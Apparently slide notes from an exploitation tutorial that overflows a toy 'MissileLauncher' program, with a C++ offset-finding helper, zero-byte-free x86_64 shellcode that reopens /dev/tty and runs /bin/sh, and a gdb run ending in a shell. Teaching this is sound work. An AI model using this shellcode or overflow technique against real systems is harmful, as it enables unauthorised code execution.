Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9
Access granted
Launching 1698771301 missiles
Breakpoint 1, 0x00000000004008dd in authenticate_and_launch() ()
(gdb) x/1xg $sp
0x7fffffffdd18: 0x3765413665413565
(gdb) q
$ pattern_offset -q 3765413665413565
[*] Exact match at offset 136
Offset of return address from buffer on the stack: 136 (found)
Address of buffer in memory: 0x7fffffffdc90 (printed by the program)
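How pattern_create and pattern_offset arrive at 136 on the slide above, as an added worked example (a constructed reimplementation, not Metasploit's code): the pattern is cyclic, so the 8 bytes gdb shows at $sp, read back in little-endian order, occur at exactly one place in it. pattern_create and pattern_offset mirror the tools' names; bytes_from_qword and pattern_offset_hex are my own helpers.

```cpp
#include <cstddef>
#include <cstdint>
#include <iostream>
#include <string>

// pattern_create: triples of uppercase, lowercase, digit ("Aa0Aa1...Aa9Ab0..."),
// so a short window of the string identifies one position, within the
// 26 * 26 * 10 * 3 = 20280 bytes the character set allows.
std::string pattern_create(std::size_t length) {
    std::string out;
    for (char u = 'A'; u <= 'Z' && out.size() < length; ++u)
        for (char l = 'a'; l <= 'z' && out.size() < length; ++l)
            for (char d = '0'; d <= '9' && out.size() < length; ++d) {
                out.push_back(u);
                out.push_back(l);
                out.push_back(d);
            }
    if (out.size() > length)  // the last triple may overshoot; trim it
        out.resize(length);
    return out;
}

// gdb's `x/1xg $sp` prints the overwritten return address as one 64-bit number.
// x86_64 is little-endian, so the byte that came first in the input is the low
// byte of that number: 0x3765413665413565 was "e5Ae6Ae7" in memory.
std::string bytes_from_qword(std::uint64_t v) {
    std::string s;
    for (int i = 0; i < 8; ++i)
        s.push_back(static_cast<char>((v >> (8 * i)) & 0xff));
    return s;
}

// pattern_offset: position of those 8 bytes in the pattern, or -1 if absent.
long pattern_offset(const std::string &pattern, std::uint64_t qword) {
    std::size_t pos = pattern.find(bytes_from_qword(qword));
    return pos == std::string::npos ? -1 : static_cast<long>(pos);
}

// Same, taking the hex digits as typed on the slide: pattern_offset -q 3765413665413565
long pattern_offset_hex(const std::string &pattern, const std::string &hex) {
    return pattern_offset(pattern, std::stoull(hex, nullptr, 16));
}

int main() {
    std::string p = pattern_create(150);  // what `pattern_create -l 150` printed
    std::cout << p << '\n';
    std::cout << "offset of the 8 bytes gdb showed: "
              << pattern_offset_hex(p, "3765413665413565") << '\n';  // 136
    return 0;
}
```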
68. New Idea! Try to close STDIN and reopen tty first
69. Write C code for shellcode
Compile it
Put bytes in a char buffer
Put jmp addr on ret addr
Write inline assembly, eliminating zero bytes
72. Build it statically, with no canary
wargames$ clang -save-temps -Os -static -fno-stack-protector -o shellcode shellcode.c
wargames$ ./shellcode
$
wargames$ ldd shellcode
not a dynamic executable
77. shellcode_asm.c
// --------------------------------------------------------
// close
// --------------------------------------------------------
"xor %rdi, %rdi\n\t" // Zero out rdi - without using 0 (fd 0 is STDIN)
"xor %rax, %rax\n\t" // Zero out rax - without using 0
"mov $0x3, %al\n\t"  // Write the syscall number (3) to al
"syscall\n\t"        // Do the syscall
%rax  #  System call  %rdi
0x3   3  sys_close    unsigned int fd
79. shellcode_asm.c
// --------------------------------------------------------
// open
// --------------------------------------------------------
"xor %rax, %rax\n\t"                  // Zero out rax - without using 0
"push %rax\n\t"                       // Push a string terminator
"movabs $0x7974742f7665642f, %rbx\n\t" // Put the string in rbx:
                                       // /dev/tty = 2f 64 65 76 2f 74 74 79
"push %rbx\n\t"                       // Push rbx on the stack
"mov %rsp, %rsi\n\t"                  // Put a pointer to the string in rsi
"xor %rdx, %rdx\n\t"                  // Zero out rdx - without using 0
"xor %rdi, %rdi\n\t"                  // Zero out rdi - without using 0
"xor %r10, %r10\n\t"                  // Zero out r10 - without using 0
"mov $0x101, %eax\n\t"                // Write the syscall number (257)
"syscall\n\t"                         // Do the syscall
%rax   #    System call  %rdi     %rsi                  %rdx       %r10
0x101  257  sys_openat   int dfd  const char *filename  int flags  int mode
81. shellcode_asm.c
// --------------------------------------------------------
// execve
// --------------------------------------------------------
"xor %rdx, %rdx\n\t"                  // Zero out rdx - without using 0
"xor %rax, %rax\n\t"                  // Zero out rax - without using 0
"push %rax\n\t"                       // Push a string terminator
"movabs $0x68732f2f6e69622f, %rbx\n\t" // Put the string in rbx:
                                       // /bin//sh = 2f 62 69 6e 2f 2f 73 68
"push %rbx\n\t"                       // Push rbx on the stack
"mov %rsp, %rdi\n\t"                  // Put a pointer to the string in rdi
"push %rdx\n\t"                       // Push a null to terminate the array
"push %rdi\n\t"                       // Push the pointer to the string
"mov %rsp, %rsi\n\t"                  // Put a pointer to argv in rsi
"mov $0x3b, %al\n\t"                  // Write the syscall number 59 to al
"syscall\n\t"                         // Do the syscall
%rax  #   System call  %rdi                  %rsi                      %rdx
0x3b  59  sys_execve   const char *filename  const char *const argv[]  const char *const envp[]
82. Compile and test the assembly ✔
wargames$ clang -o shellcode_asm shellcode_asm.c
wargames$ ./shellcode_asm
$
84. shellcode_asm.c - open (the same code as on slide 79); the line to look at:
"mov $0x101, %eax\n\t" // Write syscall number 257 to eax
The 32-bit immediate 0x00000101 puts zero bytes into the shellcode.
%rax   #    System call  %rdi     %rsi                  %rdx       %r10
0x101  257  sys_openat   int dfd  const char *filename  int flags  int mode
85. shellcode_asm.c - Write 255 and inc it twice
"mov $0xFF, %al\n\t"     // Write syscall number 255 to al
"inc %rax\n\t"           // 256
"inc %rax\n\t"           // 257
//"mov $0x101, %eax\n\t" // Write syscall number 257 to eax
%rax   #    System call  %rdi     %rsi                  %rdx       %r10
0x101  257  sys_openat   int dfd  const char *filename  int flags  int mode
90. Compile and test the assembly ✔
$ clang -z execstack -o shellcode_test shellcode_test.c
$ ./shellcode_test
len:77 bytes
$
92. Use the exploit in gdb ✔
wargames$ clang -o shellcode_exploit shellcode_exploit.c
wargames$ ./shellcode_exploit > file
wargames$ gdb -q ./launch_bigger
(gdb) r < file
Starting program: ./launch_bigger < file
WarGames MissileLauncher v0.1
0x7fffffffdc90
Secret: Access denied
process 29337 is executing new program: /bin/dash
$
104. Resources
Linux System Call Table for x86_64: http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/
Hex to decimal converter: https://www.rapidtables.com/convert/number/hex-to-decimal.html
https://www.asciitohex.com
Weird machines, exploitability, and provable unexploitability - Thomas Dullien/Halvar Flake: https://vimeo.com/252868605